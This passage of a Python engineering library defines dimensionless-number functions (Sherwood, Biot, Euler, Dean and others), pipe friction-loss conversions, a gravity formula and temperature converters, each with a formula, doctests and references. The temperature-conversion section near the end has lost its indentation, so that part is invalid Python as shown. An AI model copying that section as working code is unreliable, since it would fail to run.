        Mass transfer coefficient, [m/s]
    L : float
        Characteristic length, no typical definition [m]
    D : float
        Diffusivity of a species [m^2/s]

    Returns
    -------
    Sh : float
        Sherwood number, [-]

    Notes
    -----
    .. math::
        Sh = \frac{\text{Mass transfer by convection}}
        {\text{Mass transfer by diffusion}} = \frac{K}{D/L}

    Examples
    --------
    >>> Sherwood(1000., 1.2, 300.)
    4.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    return K*L/D
def Biot(h, L, k):
    r'''Return the Biot number `Bi` for heat transfer coefficient `h`,
    geometric length `L`, and thermal conductivity `k`.

    .. math::
        Bi=\frac{hL}{k}

    Parameters
    ----------
    h : float
        Heat transfer coefficient, [W/m^2/K]
    L : float
        Characteristic length, no typical definition [m]
    k : float
        Thermal conductivity, within the object [W/m/K]

    Returns
    -------
    Bi : float
        Biot number, [-]

    Notes
    -----
    Ratio of surface thermal resistance to internal thermal resistance.
    `k` is the conductivity *within the object* — not that of the fluid the
    coefficient `h` was calculated with.

    Examples
    --------
    >>> Biot(1000., 1.2, 300.)
    4.0
    >>> Biot(10000., .01, 4000.)
    0.025

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Bi = h*L/k
    return Bi
def Stanton(h, V, rho, Cp):
    r'''Return the Stanton number `St` for heat transfer coefficient `h`,
    velocity `V`, density `rho`, and heat capacity `Cp`.

    .. math::
        St = \frac{h}{V\rho Cp}

    Parameters
    ----------
    h : float
        Heat transfer coefficient, [W/m^2/K]
    V : float
        Velocity, [m/s]
    rho : float
        Density, [kg/m^3]
    Cp : float
        Heat capacity, [J/kg/K]

    Returns
    -------
    St : float
        Stanton number []

    Notes
    -----
    Ratio of the heat transfer coefficient to the thermal capacity of the
    flow.

    Examples
    --------
    >>> Stanton(5000, 5, 800, 2000.)
    0.000625

    References
    ----------
    .. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
       David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
       Wiley, 2011.
    '''
    St = h/(V*rho*Cp)
    return St
def Euler(dP, rho, V):
    r'''Return the Euler number `Eu` for a fluid of velocity `V` and
    density `rho` experiencing a pressure drop `dP`.

    .. math::
        Eu = \frac{\Delta P}{\rho V^2}

    Parameters
    ----------
    dP : float
        Pressure drop experience by the fluid, [Pa]
    rho : float
        Density of the fluid, [kg/m^3]
    V : float
        Velocity of fluid, [m/s]

    Returns
    -------
    Eu : float
        Euler number []

    Notes
    -----
    Ratio of pressure drop to twice the velocity head; used in pressure drop
    calculations. Rarely, this number is divided by two. Named after Leonhard
    Euler, who applied calculus to fluid dynamics.

    Examples
    --------
    >>> Euler(1E5, 1000., 4)
    6.25

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Eu = dP/(rho*V*V)
    return Eu
def Cavitation(P, Psat, rho, V):
    r'''Return the Cavitation number `Ca` for a fluid of velocity `V` with
    a pressure `P`, vapor pressure `Psat`, and density `rho`.

    .. math::
        Ca = \sigma_c = \sigma = \frac{P-P_{sat}}{\frac{1}{2}\rho V^2}

    Parameters
    ----------
    P : float
        Internal pressure of the fluid, [Pa]
    Psat : float
        Vapor pressure of the fluid, [Pa]
    rho : float
        Density of the fluid, [kg/m^3]
    V : float
        Velocity of fluid, [m/s]

    Returns
    -------
    Ca : float
        Cavitation number []

    Notes
    -----
    Ratio of the margin above the vapor pressure to the inertial (dynamic)
    pressure; used to judge whether flow through a restriction will cavitate.
    Some definitions omit the factor of 2.

    Examples
    --------
    >>> Cavitation(2E5, 1E4, 1000, 10)
    3.8

    References
    ----------
    .. [1] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    dynamic_pressure = 0.5*rho*V*V
    return (P-Psat)/dynamic_pressure
def Eckert(V, Cp, dT):
    r'''Return the Eckert number `Ec` for a fluid of velocity `V` with heat
    capacity `Cp` across a temperature difference `dT`.

    .. math::
        Ec = \frac{V^2}{C_p \Delta T}

    Parameters
    ----------
    V : float
        Velocity of fluid, [m/s]
    Cp : float
        Heat capacity of the fluid, [J/kg/K]
    dT : float
        Temperature difference, [K]

    Returns
    -------
    Ec : float
        Eckert number []

    Notes
    -----
    Ratio of kinetic energy to enthalpy difference; appears in certain heat
    transfer calculations and is fairly rare.

    Examples
    --------
    >>> Eckert(10, 2000., 25.)
    0.002

    References
    ----------
    .. [1] Goldstein, Richard J. ECKERT NUMBER. Thermopedia. Hemisphere, 2011.
       10.1615/AtoZ.e.eckert_number
    '''
    Ec = V*V/(Cp*dT)
    return Ec
def Jakob(Cp, Hvap, Te):
    r'''Return the Jakob number `Ja` for a boiling fluid with sensible heat
    capacity `Cp`, enthalpy of vaporization `Hvap`, and excess temperature
    `Te` above its saturation boiling point.

    .. math::
        Ja = \frac{C_{P}\Delta T_e}{\Delta H_{vap}}

    Parameters
    ----------
    Cp : float
        Heat capacity of the fluid, [J/kg/K]
    Hvap : float
        Enthalpy of vaporization of the fluid at its saturation temperature [J/kg]
    Te : float
        Temperature difference above the fluid's saturation boiling temperature, [K]

    Returns
    -------
    Ja : float
        Jakob number []

    Notes
    -----
    Ratio of sensible heat to latent heat; used in boiling heat transfer
    analysis and is fairly rare.

    Examples
    --------
    >>> Jakob(4000., 2E6, 10.)
    0.02

    References
    ----------
    .. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
       David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
       Wiley, 2011.
    '''
    Ja = Cp*Te/Hvap
    return Ja
def Power_number(P, L, N, rho):
    r'''Calculates power number, `Po`, for an agitator applying a specified
    power `P` with a characteristic length `L`, rotational speed `N`, to
    a fluid with a specified density `rho`.

    .. math::
        Po = \frac{P}{\rho N^3 L^5}

    Parameters
    ----------
    P : float
        Power applied, [W]
    L : float
        Characteristic length, typically agitator diameter [m]
    N : float
        Speed [revolutions/second]
    rho : float
        Density of fluid, [kg/m^3]

    Returns
    -------
    Po : float
        Power number []

    Notes
    -----
    Used in mixing calculations.

    .. math::
        Po = \frac{\text{Power}}{\text{Rotational inertia}}

    Examples
    --------
    >>> Power_number(P=180, L=0.01, N=2.5, rho=800.)
    144000000.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    return P/(rho*N*N*N*L**5)
def Drag(F, A, V, rho):
    r'''Return the drag coefficient `Cd` for a given drag force `F`,
    projected area `A`, characteristic velocity `V`, and density `rho`.

    .. math::
        C_D = \frac{F_d}{A\cdot\frac{1}{2}\rho V^2}

    Parameters
    ----------
    F : float
        Drag force, [N]
    A : float
        Projected area, [m^2]
    V : float
        Characteristic velocity, [m/s]
    rho : float
        Density, [kg/m^3]

    Returns
    -------
    Cd : float
        Drag coefficient, [-]

    Notes
    -----
    Ratio of the drag force to the product of projected area and velocity
    head; used for flow around objects or objects moving within a fluid.

    Examples
    --------
    >>> Drag(1000, 0.0001, 5, 2000)
    400.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    reference_force = 0.5*A*rho*V*V
    return F/reference_force
def Stokes_number(V, Dp, D, rhop, mu):
    r'''Return the Stokes number `Stk` for a given characteristic velocity
    `V`, particle diameter `Dp`, characteristic diameter `D`, particle density
    `rhop`, and fluid viscosity `mu`.

    .. math::
        \text{Stk} = \frac{\rho_p V D_p^2}{18\mu_f D}

    Parameters
    ----------
    V : float
        Characteristic velocity (often superficial), [m/s]
    Dp : float
        Particle diameter, [m]
    D : float
        Characteristic diameter (ex demister wire diameter or cyclone
        diameter), [m]
    rhop : float
        Particle density, [kg/m^3]
    mu : float
        Fluid viscosity, [Pa*s]

    Returns
    -------
    Stk : float
        Stokes number, [-]

    Notes
    -----
    Used in droplet impaction or collection studies.

    Examples
    --------
    >>> Stokes_number(V=0.9, Dp=1E-5, D=1E-3, rhop=1000, mu=1E-5)
    0.5

    References
    ----------
    .. [1] Rhodes, Martin J. Introduction to Particle Technology. Wiley, 2013.
    .. [2] Al-Dughaither, Abdullah S., Ahmed A. Ibrahim, and Waheed A.
       Al-Masry. "Investigating Droplet Separation Efficiency in Wire-Mesh Mist
       Eliminators in Bubble Column." Journal of Saudi Chemical Society 14, no.
       4 (October 1, 2010): 331-39. https://doi.org/10.1016/j.jscs.2010.04.001.
    '''
    numerator = rhop*V*(Dp*Dp)
    denominator = 18.0*mu*D
    return numerator/denominator
def Capillary(V, mu, sigma):
    r'''Return the Capillary number `Ca` for a characteristic velocity `V`,
    viscosity `mu`, and surface tension `sigma`.

    .. math::
        Ca = \frac{V \mu}{\sigma}

    Parameters
    ----------
    V : float
        Characteristic velocity, [m/s]
    mu : float
        Dynamic viscosity, [Pa*s]
    sigma : float
        Surface tension, [N/m]

    Returns
    -------
    Ca : float
        Capillary number, [-]

    Notes
    -----
    Ratio of viscous forces to surface forces; used in porous media and film
    flow calculations. The surface tension may be gas-liquid or
    liquid-liquid.

    Examples
    --------
    >>> Capillary(1.2, 0.01, .1)
    0.12

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Ca = V*mu/sigma
    return Ca
def Archimedes(L, rhof, rhop, mu, g=g):
    r'''Calculates Archimedes number, `Ar`, for a fluid and particle with the
    given densities, characteristic length, viscosity, and gravity
    (usually diameter of particle).

    .. math::
        Ar = \frac{L^3 \rho_f(\rho_p-\rho_f)g}{\mu^2}

    Parameters
    ----------
    L : float
        Characteristic length, typically particle diameter [m]
    rhof : float
        Density of fluid, [kg/m^3]
    rhop : float
        Density of particle, [kg/m^3]
    mu : float
        Viscosity of fluid, [Pa*s]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Ar : float
        Archimedes number []

    Notes
    -----
    Used in fluid-particle interaction calculations.

    .. math::
        Ar = \frac{\text{Gravitational force}}{\text{Viscous force}}

    Examples
    --------
    >>> Archimedes(0.002, 2., 3000, 1E-3)
    470.4053872

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    return L*L*L*rhof*(rhop-rhof)*g/(mu*mu)
def Ohnesorge(L, rho, mu, sigma):
    r'''Return the Ohnesorge number `Oh` for a fluid with the given
    characteristic length, density, viscosity, and surface tension.

    .. math::
        \text{Oh} = \frac{\mu}{\sqrt{\rho \sigma L }}

    Parameters
    ----------
    L : float
        Characteristic length [m]
    rho : float
        Density of fluid, [kg/m^3]
    mu : float
        Viscosity of fluid, [Pa*s]
    sigma : float
        Surface tension, [N/m]

    Returns
    -------
    Oh : float
        Ohnesorge number []

    Notes
    -----
    Ratio of viscous forces to the square root of the product of inertia and
    surface tension (sqrt(We)/Re); often used in spray calculations and
    sometimes given the symbol Z.

    Examples
    --------
    >>> Ohnesorge(1E-4, 1000., 1E-3, 1E-1)
    0.01

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Oh = mu/sqrt(L*rho*sigma)
    return Oh
def Suratman(L, rho, mu, sigma):
    r'''Return the Suratman number `Su` for a fluid with the given
    characteristic length, density, viscosity, and surface tension.

    .. math::
        \text{Su} = \frac{\rho\sigma L}{\mu^2}

    Parameters
    ----------
    L : float
        Characteristic length [m]
    rho : float
        Density of fluid, [kg/m^3]
    mu : float
        Viscosity of fluid, [Pa*s]
    sigma : float
        Surface tension, [N/m]

    Returns
    -------
    Su : float
        Suratman number []

    Notes
    -----
    Also known as the Laplace number; equal to Re^2/We, the ratio of
    inertia times surface tension to the square of the viscous forces. Used
    in two-phase flow, especially the bubbly-slug regime; no confusion
    regarding the definition of this group has been observed. The oldest
    reference to this group found by the author is in 1963, from [2]_.

    Examples
    --------
    >>> Suratman(1E-4, 1000., 1E-3, 1E-1)
    10000.0

    References
    ----------
    .. [1] Sen, Nilava. "Suratman Number in Bubble-to-Slug Flow Pattern
       Transition under Microgravity." Acta Astronautica 65, no. 3-4 (August
       2009): 423-28. doi:10.1016/j.actaastro.2009.02.013.
    .. [2] Catchpole, John P., and George. Fulford. "DIMENSIONLESS GROUPS."
       Industrial & Engineering Chemistry 58, no. 3 (March 1, 1966): 46-60.
       doi:10.1021/ie50675a012.
    '''
    Su = rho*sigma*L/(mu*mu)
    return Su
def Hagen(Re, fd):
    r'''Calculates Hagen number, `Hg`, for a fluid with the given
    Reynolds number and friction factor.

    .. math::
        \text{Hg} = \frac{f_d}{2} Re^2 = \frac{1}{\rho}
        \frac{\Delta P}{\Delta z} \frac{D^3}{\nu^2}
        = \frac{\rho\Delta P D^3}{\mu^2 \Delta z}

    Parameters
    ----------
    Re : float
        Reynolds number [-]
    fd : float
        Darcy friction factor, [-]

    Returns
    -------
    Hg : float
        Hagen number, [-]

    Notes
    -----
    Introduced in [1]_; further use of it is mostly of the correlations
    introduced in [1]_.

    Notable for use in correlations, because it does not have any
    dependence on velocity.

    This expression is useful when designing backwards with a pressure drop
    spec already known.

    Examples
    --------
    Example from [3]_:

    >>> Hagen(Re=2610, fd=1.935235)
    6591507.17175

    References
    ----------
    .. [1] Martin, Holger. "The Generalized Lévêque Equation and Its Practical
       Use for the Prediction of Heat and Mass Transfer Rates from Pressure
       Drop." Chemical Engineering Science, Jean-Claude Charpentier
       Festschrift Issue, 57, no. 16 (August 1, 2002): 3217-23.
       https://doi.org/10.1016/S0009-2509(02)00194-X.
    .. [2] Shah, Ramesh K., and Dusan P. Sekulic. Fundamentals of Heat
       Exchanger Design. 1st edition. Hoboken, NJ: Wiley, 2002.
    .. [3] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
       Berlin; New York:: Springer, 2010.
    '''
    return 0.5*fd*Re*Re
def Bejan_L(dP, L, mu, alpha):
    r'''Compute the Bejan number of a length, `Be_L`, for a fluid flowing
    over a characteristic length `L` while experiencing a pressure drop `dP`.

    .. math::
        Be_L = \frac{\Delta P L^2}{\mu \alpha}

    Parameters
    ----------
    dP : float
        Pressure drop, [Pa]
    L : float
        Characteristic length, [m]
    mu : float
        Dynamic viscosity, [Pa*s]
    alpha : float
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Be_L : float
        Bejan number with respect to length []

    Notes
    -----
    Termed a dimensionless number in 1988; see [1]_ for the history of the
    two Bejan numbers.

    Examples
    --------
    >>> Bejan_L(1E4, 1, 1E-3, 1E-6)
    10000000000000.0

    References
    ----------
    .. [1] Awad, M. M. "The Science and the History of the Two Bejan Numbers."
       International Journal of Heat and Mass Transfer 94 (March 2016): 101-3.
       doi:10.1016/j.ijheatmasstransfer.2015.11.073.
    '''
    numerator = dP*L*L
    return numerator/(mu*alpha)
def Bejan_p(dP, K, mu, alpha):
    r'''Compute the Bejan number of a permeability, `Be_p`, for a fluid with
    permeability `K` experiencing a pressure drop `dP`.

    .. math::
        Be_p = \frac{\Delta P K}{\mu \alpha}

    Parameters
    ----------
    dP : float
        Pressure drop, [Pa]
    K : float
        Permeability, [m^2]
    mu : float
        Dynamic viscosity, [Pa*s]
    alpha : float
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Be_p : float
        Bejan number with respect to pore characteristics []

    Notes
    -----
    Termed a dimensionless number in 1988; see [1]_ for the history of the
    two Bejan numbers.

    Examples
    --------
    >>> Bejan_p(1E4, 1, 1E-3, 1E-6)
    10000000000000.0

    References
    ----------
    .. [1] Awad, M. M. "The Science and the History of the Two Bejan Numbers."
       International Journal of Heat and Mass Transfer 94 (March 2016): 101-3.
       doi:10.1016/j.ijheatmasstransfer.2015.11.073.
    '''
    return dP*K/(mu*alpha)
def Boiling(G, q, Hvap):
    r'''Compute the Boiling number `Bg` from the heat flux, the two-phase
    mass flux, and the heat of vaporization of the flowing fluid. Used in
    two-phase heat transfer calculations.

    .. math::
        \text{Bg} = \frac{q}{G_{tp} \Delta H_{vap}}

    Parameters
    ----------
    G : float
        Two-phase mass flux in a channel (combined liquid and vapor) [kg/m^2/s]
    q : float
        Heat flux [W/m^2]
    Hvap : float
        Heat of vaporization of the fluid [J/kg]

    Returns
    -------
    Bg : float
        Boiling number [-]

    Notes
    -----
    The symbol `Bo` is more common in the literature, but conflicts with the
    Bond number. Physically,

    .. math::
        \text{Bg} = \frac{\text{mass liquid evaporated / area heat transfer
        surface}}{\text{mass flow rate fluid / flow cross sectional area}}

    First defined, unnamed, in [1]_.

    Examples
    --------
    >>> Boiling(300, 3000, 800000)
    1.25e-05

    References
    ----------
    .. [1] W. F. Davidson, P. H. Hardie, C. G. R. Humphreys, A. A. Markson,
       A. R. Mumford and T. Ravese "Studies of heat transmission through
       boiler tubing at pressures from 500 to 3300 pounds" Trans. ASME,
       Vol. 65, 9, February 1943, pp. 553-591.
    '''
    # Denominator is the latent-heat-carrying capacity of the mass flux.
    latent_flux = G*Hvap
    return q/latent_flux
def Dean(Re, Di, D):
    r'''Compute the Dean number `De` from a Reynolds number `Re`, an inner
    diameter `Di`, and a secondary diameter `D` (diameter of curvature, of a
    spiral, or another relevant dimension).

    .. math::
        \text{De} = \sqrt{\frac{D_i}{D}} \text{Re}

    Parameters
    ----------
    Re : float
        Reynolds number []
    Di : float
        Inner diameter []
    D : float
        Diameter of curvature or outer spiral or other dimension []

    Returns
    -------
    De : float
        Dean number [-]

    Notes
    -----
    Used for flow in curved geometry; represents

    .. math::
        \text{De} = \frac{\sqrt{\text{centripetal forces}\cdot
        \text{inertial forces}}}{\text{viscous forces}}

    Examples
    --------
    >>> Dean(10000, 0.1, 0.4)
    5000.0

    References
    ----------
    .. [1] Catchpole, John P., and George. Fulford. "DIMENSIONLESS GROUPS."
       Industrial & Engineering Chemistry 58, no. 3 (March 1, 1966): 46-60.
       doi:10.1021/ie50675a012.
    '''
    curvature_ratio = Di/D
    return sqrt(curvature_ratio)*Re
def relative_roughness(D, roughness=1.52e-06):
    r'''Compute the relative roughness `eD` of a pipe from its diameter and
    the wall material roughness. The default roughness is that of steel.

    .. math::
        eD=\frac{\epsilon}{D}

    Parameters
    ----------
    D : float
        Diameter of pipe, [m]
    roughness : float, optional
        Roughness of pipe wall [m]

    Returns
    -------
    eD : float
        Relative Roughness, [-]

    Examples
    --------
    >>> relative_roughness(0.5, 1E-4)
    0.0002

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers'
       Handbook, Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    eD = roughness/D
    return eD
### Misc utilities
def nu_mu_converter(rho, mu=None, nu=None):
    r'''Convert between kinematic and dynamic viscosity, given density and
    exactly one of the two viscosities. Raises an error if both viscosities
    or neither viscosity is provided.

    .. math::
        \nu = \frac{\mu}{\rho} \qquad \mu = \nu\rho

    Parameters
    ----------
    rho : float
        Density, [kg/m^3]
    mu : float, optional
        Dynamic viscosity, [Pa*s]
    nu : float, optional
        Kinematic viscosity, [m^2/s]

    Returns
    -------
    mu or nu : float
        Dynamic viscosity, Pa*s or Kinematic viscosity, m^2/s

    Raises
    ------
    ValueError
        If `rho` is None, or unless exactly one of `mu` and `nu` is given.

    Examples
    --------
    >>> nu_mu_converter(998., nu=1.0E-6)
    0.000998
    '''
    # Exactly one viscosity must be supplied alongside a density.
    n_given = (mu is not None) + (nu is not None)
    if n_given != 1 or rho is None:
        raise ValueError('Inputs must be rho and one of mu and nu.')
    if mu is not None:
        return mu/rho
    return nu*rho
def gravity(latitude, H):
    r'''Calculates local acceleration due to gravity `g` according to [1]_.
    Uses latitude and height to calculate `g`.

    .. math::
        g = 9.780356\left(1 + 0.0052885\sin^2\phi
        - 0.0000059\sin^2 2\phi\right) - 3.086\times 10^{-6} H

    Parameters
    ----------
    latitude : float
        Degrees, [degrees]
    H : float
        Height above earth's surface [m]

    Returns
    -------
    g : float
        Acceleration due to gravity, [m/s^2]

    Notes
    -----
    Better models, such as EGM2008 exist.

    Examples
    --------
    >>> gravity(55, 1E4)
    9.784151976863571

    References
    ----------
    .. [1] Haynes, W.M., Thomas J. Bruno, and David R. Lide. CRC Handbook of
       Chemistry and Physics. [Boca Raton, FL]: CRC press, 2014.
    '''
    lat = latitude*pi/180  # convert degrees to radians
    # Latitude terms correct for the Earth's oblateness and rotation; the
    # final term is the free-air correction for height above the surface.
    g = 9.780356*(1+0.0052885*sin(lat)**2 -0.0000059*sin(2*lat)**2)-3.086E-6*H
    return g
### Friction loss conversion functions
def K_from_f(fd, L, D):
    r'''Compute the loss coefficient `K` of a pipe section from its friction
    factor, length and diameter.

    .. math::
        K = f_dL/D

    Parameters
    ----------
    fd : float
        friction factor of pipe, []
    L : float
        Length of pipe, [m]
    D : float
        Inner diameter of pipe, [m]

    Returns
    -------
    K : float
        Loss coefficient, []

    Notes
    -----
    For fittings specified by an L/D ratio, pass D=1 and L equal to the
    ratio itself.

    Examples
    --------
    >>> K_from_f(fd=0.018, L=100., D=.3)
    6.0
    '''
    equivalent_lengths = fd*L
    return equivalent_lengths/D
def f_from_K(K, L, D):
    r'''Compute the Darcy friction factor `fd` which, over a pipe section of
    length `L` and diameter `D`, produces the loss coefficient `K`.

    .. math::
        f_d = \frac{K D}{L}

    Parameters
    ----------
    K : float
        Loss coefficient, []
    L : float
        Length of pipe, [m]
    D : float
        Inner diameter of pipe, [m]

    Returns
    -------
    fd : float
        Darcy friction factor of pipe, [-]

    Notes
    -----
    Useful for smearing the pressure drop of localized fittings evenly
    along a pipe.

    Examples
    --------
    >>> f_from_K(K=0.6, L=100., D=.3)
    0.0018
    '''
    scaled = K*D
    return scaled/L
def K_from_L_equiv(L_D, fd=0.015):
    r'''Compute a loss coefficient from an equivalent length (L/D).

    .. math::
        K = f_d \frac{L}{D}

    Parameters
    ----------
    L_D : float
        Length over diameter, []
    fd : float, optional
        Darcy friction factor, [-]

    Returns
    -------
    K : float
        Loss coefficient, []

    Notes
    -----
    Like `K_from_f`, but the default friction factor corresponds to fully
    turbulent flow in steel pipes.

    Examples
    --------
    >>> K_from_L_equiv(240)
    3.5999999999999996
    '''
    K = fd*L_D
    return K
def L_equiv_from_K(K, fd=0.015):
    r'''Compute the equivalent length of pipe (L/D) corresponding to a loss
    coefficient.

    .. math::
        \frac{L}{D} = \frac{K}{f_d}

    Parameters
    ----------
    K : float
        Loss coefficient, [-]
    fd : float, optional
        Darcy friction factor, [-]

    Returns
    -------
    L_D : float
        Length over diameter, [-]

    Notes
    -----
    The default friction factor corresponds to fully turbulent flow in
    steel pipes.

    Examples
    --------
    >>> L_equiv_from_K(3.6)
    240.00000000000003
    '''
    L_D = K/fd
    return L_D
def L_from_K(K, D, fd=0.015):
    r'''Compute the length of straight pipe which, at the specified friction
    factor, produces the loss coefficient `K`.

    .. math::
        L = \frac{K D}{f_d}

    Parameters
    ----------
    K : float
        Loss coefficient, []
    D : float
        Inner diameter of pipe, [m]
    fd : float, optional
        friction factor of pipe, []

    Returns
    -------
    L : float
        Length of pipe, [m]

    Examples
    --------
    >>> L_from_K(K=6, D=.3, fd=0.018)
    100.0
    '''
    scaled = K*D
    return scaled/fd
def dP_from_K(K, rho, V):
    r'''Compute the pressure drop produced by a loss coefficient at a given
    fluid density and velocity.

    .. math::
        dP = 0.5K\rho V^2

    Parameters
    ----------
    K : float
        Loss coefficient, []
    rho : float
        Density of fluid, [kg/m^3]
    V : float
        Velocity of fluid in pipe, [m/s]

    Returns
    -------
    dP : float
        Pressure drop, [Pa]

    Notes
    -----
    `K` is usually the sum of several contributions, including the friction
    factor term.

    Examples
    --------
    >>> dP_from_K(K=10, rho=1000, V=3)
    45000.0
    '''
    # Loss coefficient times the dynamic pressure 0.5*rho*V^2.
    return 0.5*K*rho*V*V
def head_from_K(K, V, g=g):
    r'''Compute the head loss produced by a loss coefficient at a given
    velocity.

    .. math::
        \text{head} = \frac{K V^2}{2g}

    Parameters
    ----------
    K : float
        Loss coefficient, []
    V : float
        Velocity of fluid in pipe, [m/s]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    head : float
        Head loss, [m]

    Notes
    -----
    `K` is usually the sum of several contributions, including the friction
    factor term.

    Examples
    --------
    >>> head_from_K(K=10, V=1.5)
    1.1471807396001694
    '''
    # Velocity head V^2/(2g) scaled by the loss coefficient.
    return 0.5*K*V*V/g
def head_from_P(P, rho, g=g):
    r'''Compute the head corresponding to a pressure for a fluid of the
    given density.

    .. math::
        \text{head} = {P\over{\rho g}}

    Parameters
    ----------
    P : float
        Pressure fluid in pipe, [Pa]
    rho : float
        Density of fluid, [kg/m^3]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    head : float
        Head, [m]

    Notes
    -----
    By definition. Head varies with location, inversely proportional to the
    local gravitational acceleration.

    Examples
    --------
    >>> head_from_P(P=98066.5, rho=1000)
    10.000000000000002
    '''
    return P/(rho*g)
def P_from_head(head, rho, g=g):
    r'''Calculates pressure for a fluid of specified density at specified
    head.

    .. math::
        P = \rho g \cdot \text{head}

    Parameters
    ----------
    head : float
        Head, [m]
    rho : float
        Density of fluid, [kg/m^3]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    P : float
        Pressure fluid in pipe, [Pa]

    Notes
    -----
    Inverse of `head_from_P`; by definition of hydrostatic pressure.

    Examples
    --------
    >>> P_from_head(head=5., rho=800.)
    39226.6
    '''
    return head*rho*g
### Synonyms
alpha = thermal_diffusivity  # synonym for thermal diffusivity
Pr = Prandtl  # synonym for the Prandtl number function
# Temperature conversion constants (values in kelvin)
zero_Celsius = 273.15  # 0 degC expressed in K; offset used by the converters below
degree_Fahrenheit = 1.0/1.8  # size of one degF in K; only for differences
def C2K(C):
"""Convert Celsius to Kelvin.
Parameters
----------
C : float
Celsius temperature to be converted, [degC]
Returns
-------
K : float
Equivalent Kelvin temperature, [K]
Notes
-----
Computes ``K = C + zero_Celsius`` where `zero_Celsius` = 273.15, i.e.,
(the absolute value of) temperature "absolute zero" as measured in Celsius.
Examples
--------
>>> C2K(-40)
233.14999999999998
"""
return C + zero_Celsius
def K2C(K):
"""Convert Kelvin to Celsius.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = K - zero_Celsius`` where `zero_Celsius` = 273.15, i.e.,
(the absolute value of) temperature "absolute zero" as measured in Celsius.
Examples
--------
>>> K2C(233.15)
-39.99999999999997
"""
return K - zero_Celsius
def F2C(F):
"""Convert Fahrenheit to Celsius.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = (F - 32) / 1.8``.
Examples
--------
>>> F2C(-40.0)
-40.0
"""
return (F - 32.0) / 1.8
def C2F(C):
"""Convert Celsius to Fahrenheit.
Parameters
----------
C : float
Celsius temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = 1.8 * C + 32``.
Examples
--------
>>> C2F(-40.0)
-40.0
"""
return 1.8*C + 32.0
def F2K(F):
"""Convert Fahrenheit to Kelvin.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
K : float
Equivalent Kelvin temperature.
Notes
-----
Computes ``K = (F - 32)/1.8 + zero_Celsius`` where `zero_Celsius` =
273.15, i.e., (the absolute value of) temperature "absolute zero" as
measured in Celsius.
Examples
--------
>>> F2K(-40)
233.14999999999998
"""
return (F - 32.0)/1.8 + zero_Celsius
def K2F(K):
"""Convert Kelvin to Fahrenheit.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = 1.8 * (K - zero_Celsius) + 32`` where `zero_Celsius` =
273.15, i.e., (the absolute value of) temperature "absolute zero" as
measured in Celsius.
Examples
--------
>>> K2F(233.15)
-39.99999999999996
"""
return 1.8*(K - zero_Celsius) + 32.0
def C2R(C):
"""Convert Celsius to Rankine.
Parameters
----------
C : float
Celsius temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = 1.8 * (C + zero_Celsius)`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> C2R(-40)
419.66999999999996
"""
return 1.8 * (C + zero_Celsius)
def K2R(K):
"""Convert Kelvin to Rankine.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = 1.8 * K``.
Examples
--------
>>> K2R(273.15)
491.66999999999996
"""
return 1.8 * K
def F2R(F):
"""Convert Fahrenheit to Rankine.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = F - 32 + 1.8 * zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> F2R(100)
559.67
"""
return F - 32.0 + 1.8 * zero_Celsius
def R2C(Ra):
